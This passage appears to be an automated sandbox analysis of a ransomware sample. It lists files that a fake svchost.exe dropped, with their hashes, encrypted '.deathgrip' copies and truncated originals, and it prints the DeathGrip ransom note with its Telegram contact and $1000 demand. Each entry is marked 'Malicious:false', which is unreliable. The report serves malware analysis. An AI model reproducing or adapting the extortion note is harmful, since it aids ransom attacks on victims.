                                                          SHA-512:C3F02617E72FFF649D838657DDCB85914B0A0C8D98DF2485B8DDF5C486335025235B70B16D22A5015BE1763C44F20305CAA15AF0685B6994ABFD71D6F83F4A11
                                                          Malicious:false
                                                          Preview:........-..2+....z..$.J..`........o.X.....<h.....k........<,.a.6...#'g\..[.bc..`.9.F,&.8.U..9.y.*bN0..]6....<.^zKC7n5rQIEH8RGsKkSUniRv/s55mcMism/IhAHXpGjOs8yawz2743XjRoFg5JfSmQgdoBVX/TmW/mfadGnIuXfrdSt64f1tI2fMyg4anoj8wIVK0JQ1tknV0bkF/kcP5CiHyZG9ey4LeVoPO+rBWBcPHVM//yrumhVYHuOp/hkpYpam/lAPah05D9Kn3y3js0rXy53k72lsIaQoM3GggO3YK8xpcDB8mdO+TuBQVro4egMOYVlM3nIoOZzj9W+tnuImbxnX/XwpkHdADKR+9FDU9xX00HYmw+uvBEsQ9UUyxbRp0CG0AIDtvvYXSdAQCXXwxaP3aCzF2eQ65tO1MR5Q==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\Uninstall a program.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\Uninstall a program.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.462509596197924
                                                          Encrypted:false
                                                          SSDEEP:24:ceAl/RT8OVWDpudteh7dF5hNv+xgHPdWIv5:ceqR8O0Dmch7b5b0gHPwIR
                                                          MD5:784A2CAF4CF71443564E3786B1556031
                                                          SHA1:519F6C24FB489E8E721F71DC2CC658F0D89878D9
                                                          SHA-256:C1C73AAE7256C58300F6198D5DD3111E94B5EDEFB857DAE8E7149E7ABC33425F
                                                          SHA-512:A6A23CC7C4DA68C637D2F27B6E130F2A31FA1ACD17D54F2977ECD8A2CF10B3C7B04E2052D288FE1D585BA0BEC707054C4984E30D04F723C494D8CCB4442F09D0
                                                          Malicious:false
                                                          Preview:.............x.....zn9Qbv.K.........CVK...!..1......Tc...z....s.a.=..]W.#.m.Q.zu......-L)E.Kz.0..A..T.&..........^{.."..t.Jw_./.{..jD.5....B;Bi...{....q.K-}...c...m...0X....X=.%.`...&*.'.....J..2m$7........@.....#8~..P.d..1`...o...>4...j...9V'-<.N.0....0(....${.Md.....HD......>...py.:..g....>e2.../R...?.......5._.AG.."t...}+|..Ve...,.$....A...."..XZ.G.e.EJ....C..T..J........U.&.Axa<3..?p.H........?g$7*..d..4'..!4<.....V.3B.3"]G.<T.l.E*K..$..jRZBv2FRW8m5PbopKVabqb0D0UZJWysJf+t3z3o0uP2thTB3A1XcnO0WVTZdvkcBg4a0kr/l2FOrsdSgtwS0H4qFcl67tX2qBlSUwuNXwV0H0iXDwJ+W4MGuPMj+JYhq32DaZur1FCwP/b3kJruY2KVzl6YHtU502dzKiqciXqDJLmjgRyL7bTd+5rxliywnAutHUNSTBwqAEYT8EMNsIQL3n+wh4X+asvHT1SBAu8nq8LzaH42dmJSFlCNy+6eshNvrAjru/GS1SIjpibqN8kpUpyutpqUO1c70pU8M0DIlJIy/hZJ5PiUKhM/n8MH4tJl+V5reE7HnJYo7t15ffw==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\User Accounts (2).lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\User Accounts (2).lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):480
                                                          Entropy (8bit):6.710810972919869
                                                          Encrypted:false
                                                          SSDEEP:12:scb3Ltc/gjKv1UGkRgpxnMK2Cm8ZgAS+BzRM:scb3Zcoj91Y5MKtmygYRM
                                                          MD5:11C50039B99DF4E9BBF2523E6E92D229
                                                          SHA1:7D2B092DEC4EB5BEC7762F524B9BF1634CEAB2D6
                                                          SHA-256:7272229F7E1B7F01A076655C309328ED91D52CDBED20F16FADAEC6BF587BFE15
                                                          SHA-512:4C98C8137FF8F25CEA5A8360E32B4AC5FAFAFEC678466F75A47A03FE836A04525F4DB37803112C779867EB95F5DFD1FC59A46FF3B380F2457C6CEEBA030C4D2D
                                                          Malicious:false
                                                          Preview:........O.!+.lz.o..Z..3}....= ...F;%.s.3..Z........n.)..Vw..l......../...3@.O.E*.../.$@.+..[RHE...r!...Uoy.....*.2.y.F......{..IDdbclmjQF1o3T7tDlkxpk1P0MupWCVpbgAkXsBx4lfB2VTQPT8dKQrQjuKoO+Jymc/JYgwAgplobtmoSlkpSDwVV5j/fCfWsDBOPo3ERUaOgxcluDK3Zr4cbqO/8Px/N9heVcS39wVjzyZHJu5SW7RiuY4KCORNs031/d9R4NG0FUgEdsXvrmC8JnJ27fNbkCzQMLVoWWk/2NjIc7ENiDWk0E50YzVwqO3giMTB8b+fMTnUAFuF1cnU2LqEiUjs6hprYkjz2gjhu4T//jKikwzXUbcKkyBs23vwhYTgZaASNQqodWzWhtMHPaapUVS7a5Mfg360nm6rh478NRfkNw==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\User Accounts.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\User Accounts.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):6.809973381523657
                                                          Encrypted:false
                                                          SSDEEP:12:86iCSfwjIRsNbDaF+RnZcqhj9WLpe8Xgcy/fMHv:8eSbRsNbG0RiqhAE3XMP
                                                          MD5:C8FA35A09041A66E4517D729DCFC621E
                                                          SHA1:B32451E49A76E3C909D1F717DABA3D634403067C
                                                          SHA-256:A0CE6289737C30882F09CA87A8390306729284111ED3445262FD9FDF7786A309
                                                          SHA-512:C9F10E9FC42B29DC220604180C28347BAAE470074D34981B77F3AF878256EFEC0903882CFEBAD9E4ACAAC03480E4E46EDF8FD51A5C5E122417B5385B85F248C9
                                                          Malicious:false
                                                          Preview:..........I.W....,.>...R.&.m.].N+.N...T.,.d.K&... y..l.K'o.,...C.:"*.i"*BL..a.\&..R...I.S......0N..w..X....o..Z.R...su.l@.t.....jJ.+r......O?.}..R.o."......%+...AwU8Ux1re4JJ+9rlGVluYLkMX1cgKwyv47APi0YIa+DItG9yM0mk9hzQX++FfpbKXK3xqYNDYJI0V//9J092K033/xM5Nhq7OHcpxN1SrVV34NKBsrCHU1EvJ5uuV1YN7gIuCxTkUnNue4u84Kx6XpefPabV3+lL+ULX1p9hVD8Pggw4W5yFMQ632u5HHr/G8f9h3Up9BeqSdlEq9xJG4489AdPmFCwRlXNkNdT21he6zy9WTEg/Jw0qaTIT3PSszb6o1Tf2RiwEErwGVMJxxlFZIFSw6nt8yz+Y9FYh5W5KCxubn0Ha+vAgPrnebKJ5mcOcpbFNw+xn6olHHCk0kw==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\all (192.168.2.1).lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\all (192.168.2.1).lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1648
                                                          Entropy (8bit):7.8193323525193295
                                                          Encrypted:false
                                                          SSDEEP:24:8rNdWACkkHWPPeRU8d8x8WwjQkuvv/U/Yd/8q5uLTocyO8MrPbApKWyonWN0wXY2:8rNNCkkHWPPv8VJuoS8To8dOWP
                                                          MD5:58DD93E55EE77AEDB5936F214699F6D3
                                                          SHA1:60790E5CFDEDD349DD3153FF1773A945BD6DF49F
                                                          SHA-256:CB07150CB95F64453146203A6914120DE18D5E703973BDDECCF146FC9DF57BB3
                                                          SHA-512:42AA7894A7C24003AEB7F0C634E810CC147AF72AD68D08C2F38044FA8AF7DDB416BF94E4484086799881DC4E3738DAA148882EB02028F890CFB1CFA87F2730B4
                                                          Malicious:false
                                                          Preview:.........h.mD.Q8.6o...3.b.v..G.V..^...$.-...S%..AD......y0sw..h.{..r...........9.(...b..Q.....Y.Qt+.(....\U....\Fer..."Yr.....fJ.B.H.Q.wf...$h.L...rn}..z.h*..a...E......y......~y.I.}..e..[...3..._$9.*..8/X..A..)...39.P;y.I.Q!.2;..+.~....GX...h..q..l0.IU....9.....H|..0.H.d.0l....6..e....i)..;<-p.E8!.....\..i....r..e.9...<....m#............+._b...@p.D9.Q..q.<.(...T..P.|.......VI?O>.|...d_.-....n/E....]_.^.d...a..T.....%.......B..K..n!...JD..e.,.\.A.....k?w.p...z... .d....f.>ZQ.w..dV.L..........!.ea...{V...76.VX.a........P.........HB.....`.....[...7d..3.....N.\.h.m..\........Y.n.5. ..~p..E....<.9.../....>...R.>...R.1u.K-..A.6...%cHsF)t.....c..jw.w...4.!.q..r..l0.......[.I,w.r..%.l..k...).........X..J.|T....^.O.!)G..]./.a.:......b.... D.o.......c~..f."..E3w8;..n2..e....,vz.SY1.".b?P.3.H..j$.-.Df..{.i;/\..c.1k#B.8.......4okl+...]i>.Y......D.].........^..j..y.&...+......#...t?u..I..Qp..[.ox...].....<.../..B..xI..n..`n.L...........^.l".-

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\ms-settingsnetwork.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\ms-settingsnetwork.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):6.8631526645920955
                                                          Encrypted:false
                                                          SSDEEP:12:639HXeAWNWCbS6/0h3CpLDZAudhsHOuOKlATLTx3CZiBCC:6tHXEWCGhyVPhEOKSTLlCeCC
                                                          MD5:05627224BE28E98026EF328162BF4F86
                                                          SHA1:D671EF4D7FBED057905B040A19A25F7F7959A9E4
                                                          SHA-256:BD4F5A7C73CD208B6532ACA6E4021FC9A84717EC225F1EA590564281670C6C17
                                                          SHA-512:95A5C522CDC5518184E396D32D079414D53E2D7DEE553FE0C08CF230166E951EDDF2D274D574717B2666B18EC43A29BE421C79674A347FDD9337E7892B20129A
                                                          Malicious:false
                                                          Preview:............7...j...O..W..=.J.....62+Ht.9,....r9..7.:j....>d.%1"Z..3C}..Q.......A.3s .......%~].e!...E....U.P..b=x.....t....h........uSD...!..........!....)...6ZdFt7CpeTdOubbD6/JqSCiL7FLKBwpGfXrLAPt+hodkyrNeFd8Du2yaMRIuhUWjxzGOlma1PaD6JEpB0SV4KIxlP28e5rHhQv3Bl7r9oIF7FUdMhXEbAxUMI20MVJCxi1VZVU0CANX7NWF3jC9XI8aD62uuXTRyQXmF5S5CSBWKXGF16THhVhEv+bcZNhoXqEntkAGWFR6TjSHlJtwge3lvRj3AVtbzcc3ikfVE/EcL0QsdUbdDsjt9cc07SGBK6u5vwiinvKeL4dmMpSPYQv7/UQ1EPfS8nV8oXPK5B0/UdlLKKm8IRPaIY9VP9VwjTiEPHLN+0glJfQrYlrzb8bg==

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1408
                                                          Entropy (8bit):7.73779078742812
                                                          Encrypted:false
                                                          SSDEEP:24:rCPbfrNEyAEwnNsF4K1ZgMlPXO9E40rjxV6lEHuSutJQxpnFa/JL3EeF:raoEwNw7bPXOajxVUaew+LT
                                                          MD5:3B4EA70980080CE595CF8442137B33EA
                                                          SHA1:624A8BB3AD1156DCEDF15B8268C2D83429C8B979
                                                          SHA-256:1A43A17DCCDC704EB95C88A29F04C2E3615389A10C66E43AC1A3309BA9D4C428
                                                          SHA-512:2FCA39C5AB621366B0F44CF4A1B30A564EE0B184E76EFD24A89BC1917A0C66259B9969C3A3D45442E0A3CAF1320BD0909026C14044EF3F7048AC51D64EB3B207
                                                          Malicious:false
                                                          Preview:..........}.BG.f......1.k.S"?...W4y..,..@%/IW.Uq..Z.W....I.....(.J...U.`.......|\.v]......t4..B..uuQ.eno...N..u..W..9.p.....q>t......T8.v.+)x6...r..U.f.o)n.]?.......G.m.6[..FDB..d...u!...#(.-8.....M....O.'....J..........q.\.^...h..0.KZ.....(....Vgk...l....z...df...e..o"fN..+\..V)(h..QReu..@.m.W.....i..._....w%M.h.......&..O.i....z.J..]N."w(`...SP..p.......N/..J{hy..G.D.....5m+..z?.o...~w!...}.....>?.bG...Q../6.6.;..!&|.s.Avp..#g.Y.)3n...2b&\#.e,.DK.Eg...o...e.X..+...l......f*.Z(.+;...'..i.'...Wq8H0/...GW.....U* ;..v....3/......Z.c....KMw9.[.}..4XA<.)....j.....SI.H~.....v.a....].),...&?....R..^$....n...rk.?....R:.......K.(..;eO.;...x....%2.\.'...BF..n[>K.d...6.xfYAi.i.{Am.y...m&yc/..'L.\Z.....Q".:=.|?...flR...%aGc....!B.).^K..U...q..T.=..^....0[d}.QO....r.{.<...=P._.$..f-..O.\...N.n+sM..$V.i.2.y.v..6p*.s...Li.t6uf.a..`...l.:.b..UV.}..*.a...../..~.hD.(.)....."..z... .'~n4K..H]........lv.B..|...2.y:<.\&.".|.M.(.?.l.-..Om.N=.. ....D.o....P3.m.....

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.7957105177902175
                                                          Encrypted:false
                                                          SSDEEP:24:cafd4i+C/o253gBVsUgCE4aUy8Ybj2g9x02tj2vhH8JaAUEJ1:rHvmYPCEUyV2g9u2IvhwabEJ1
                                                          MD5:DFB5099AB26A85DD6ACDF26E52608269
                                                          SHA1:3D1A0161FDECA5129CF5F89D092A2EF83A734C92
                                                          SHA-256:995D2D2762BF8D83ECCD61B7EEFF0C5FF9B69A04AB13BA285B53489E1D5F4F90
                                                          SHA-512:A634248814F272EC6D197AAF2EEE4445A0402AAC260B43B0AB5AD5C9F06F0F30A5B7C2211D3914614A2FB30ACE3E9CDF558B1A6D71493C4444F3B044C43E1161
                                                          Malicious:false
                                                          Preview:.........It..P7.6. '....&..i.O.I.2..L....<././.....k...d.....9...I.....1..........@......%'..5..u..H$.I.V.[..Z..:.........tZ..x-....Y..<.'....h(...........NR<=..> XCs.w._....w.q5.....d...a...s...(8......&..{...Z...B..5...l&..2r.w......XY..V3...p....MV.K-..QL2,..HA.......6..H.oZ.3......n.8.2~'...$......l.a...N.4.x.j.S ..|..t..w....r...\...~Q..@>...`....J.}....^....@".`k.k...D{."....@v....%!..=..&HU...g]....N.5..W..A......T{..`..>L..Wo.R"....\x.r5.H.{.....7{.%..[..;G.q..k.8..;B...9.^.[....?....j<$.n>".....fQ.O......X..9..<N..So...O.qD(........'..R...O.P,..~.t.....2...y.Y.h...D.X.....$.........pq....X..W.....2.uE.=.%*c.[.....|....1....gwL2....\].q|.....N...ND...W....Q....O..|"..\U7>....C..\E.|xo5t....J....(T.....R....>..s.$..pAbp.II.......^t.W..&..]L..P. ...>.nu.w....D..R.)c..*..Z_q/...Z....o..F..$.&N..,....<.<..v..6.}.......gXy..]N...!}.j.I8....&..p....QsA.m...QH.*..\.m..4&...-..r.p.Lm.F........A]h..)V.....I+...{ZC.[.E..F...T.,...

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\SendTo\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.740304340690895
                                                          Encrypted:false
                                                          SSDEEP:24:U96XxSibG0t3cRARP3trUC+A/j3LQKex04d8Bw9yg9GP5sxcH9T5vixmuVQumZf8:26hpbYR2rUCp/j30KeO4dgaDQscH9T9M
                                                          MD5:669A4ED394EAFAF38F56994C05F68AF6
                                                          SHA1:0D7BD3B9EA2C1813705531299F3822C060704491
                                                          SHA-256:C72A051006A97515133276CA607DD5D78BCBA699E6FB1D30FB5F91084CD52D3A
                                                          SHA-512:7A8F1652796FB2B4B256E3E277FA24642C42F32EF11487BF5F3AD53A548CE06E896A71BD90A5506C491DC13C395CB1D5E265B910508410C5EB41560395FDEA37
                                                          Malicious:false
                                                          Preview:.........v.Y......?t.....8b!V...9....\.x.io!y.}.U%.V.y.a.-..~`1..x.`+.(XL.. ..)*<.4.Zu.L.....T...7.9...L%AqL.q.\R..=..U.'..k!C..$h..U..T2.....&Z....8.^.xL....E..#.}d...n.....2...5..)...y.n...qBC..|.c........i....Z.C..l$YC.r.....3j.>T'_h...g.$..-.s.....U(5k...jG.....e...vf`\.d-...b..\?...b...!T.p....Q..X...w.v.UL...(5..j.... (.x.......=U.>.......dg)KH..\...Iu..1........'#....x..1.y.u../".u.{7..'[[....~b..T....Y....,.P.9.e....Sz......$r....!.4@.......uVf5...t..=J`5..4.....8^wF.N6.W.z..tat.n!.C9........aI..P.....D..O......5....}.....yj..P=..x.6Wn.5.jsv.\R.76....+. q,.&.,.....d.73.....Pm..;.A.:.)."Y.h..v]".........#...8.}.aXt..S.=..V.*.1...T. Z......T.3.s.8.2t.A.|.6.....F.=..~s......I..&....o...D1(~.D....O.......!u^=}.....(&_ddg9...2.._..@..#..q...Y....q2[.O.nwq.1^~!drC.9N.=Z.T.0...>1.......}..d......+.M.......H..wi.6.k.B........4....4.,8~..zj.....)...U...A...l..T.2..-...=...P.....j./.. HL.Q...r/...j..d...@6............eZ.~-...(.k)...$...q...`............

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.768894215410588
                                                          Encrypted:false
                                                          SSDEEP:24:2irDrf6u4FRxhngQ2tX28ptr95D8/cgwJVBQmo3k8kikgM8/OWShwQm/zIsG:2I/f69xhgQ2F94MTjEDkCM8/OWTQ0EP
                                                          MD5:4161E5A754536147108741BE43CCEF69
                                                          SHA1:19245672BF580094FCA74FFC0A144F566ED78DE2
                                                          SHA-256:7B05FF31C76FEC2FB2D77B88917C25A27DB816B028CC73D7955A5CE963C1FDE2
                                                          SHA-512:6FC198D51CDAA9324157FDCAE293B01DA6815F67980ABBD0140CBEE0A7F7A14860FBD6A4C914A32FC3F67ECBA288ADEA106D0905724BC11E0351827B436A0CFC
                                                          Malicious:false
                                                          Preview:........x....=o<_.........sI%mj3...T0.?S ..wFE...Tg...<.Z....3............NS.T...Px.5]..O....atc......<....x...F.....sV.Y..c...y$..|>Pa.....v..,..Bm.5......=\I..T...s...S..!%..Un...E.V..?..../...uH&.....|...G.....>..X?.>......?...CG{.x,$....v`...4V..I..X.c...=..4...t.E.N..,.N6YJ..+..J....R...~..0}..T|...<Z.S.H..rN@?E.GG.q.d........F..-xg..k:..2,.m....I|MP.g.....h....0..}..P.HT....Y(.%....U....v.g_K'.%...)...qF......q..q..l..-q........d... q..&.W.rL.s......>.V%.DS;.65X/}.e....`.1.s..|.B.3.M..2XX+.*...).>.........D/..zwk..Cx....D..Z.....].../.....Z....n.p.AYW.W..n....!d...%.@y...A..9...n..`t..'..g.~x/.9..s#...8.V.i.......,.O_J...m...j2.......)...B.p..{\.p..6.....P.ioz...r.5.4.9.M`(..Wu3d9.dKc..r.m..}y..n.C]E."x.c$.b..%..L6..D,.A....P_......%..k|A.j....[...w'B....5!Pi..j..........W.......x.>.p'+..<G.&..*i...qj+Rr.....t.....:c..M..Ma..J...M.K....r'....J_..WkLL..m..."|f+.2.O..E.....k.<.PK%._w*..4b;.v...x.*..y.....:.jy.y.........T.......:

                                                          C:\Users\jones\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.7811425930211096
                                                          Encrypted:false
                                                          SSDEEP:24:Dkx4cOoOGQRl2aPV8PSFAZlZIBKPcyMxrUwE4Lj7N4l12NKPv06n0uVPt/+t34OP:DDoO3zR8aFAZl1gxrUwE4/xc12NS0m0J
                                                          MD5:8E779279366F2E4F2BAFE988B54D34B5
                                                          SHA1:E9AEA3ABCC40427A67D49A458A61767FDBFEBF36
                                                          SHA-256:1BF845F0A839C94DD6C604A5A4BC3057AC522D7EC0665A065F85C2EB59D4237E
                                                          SHA-512:716217DAEA2FDCA589C0CA0DD798C321B51A2924F49E500537F8923B200589D135DDD70D848DE9F58ED4BA19659C635D7A15D589DEA179EFE95302A68DDFEC15
                                                          Malicious:false
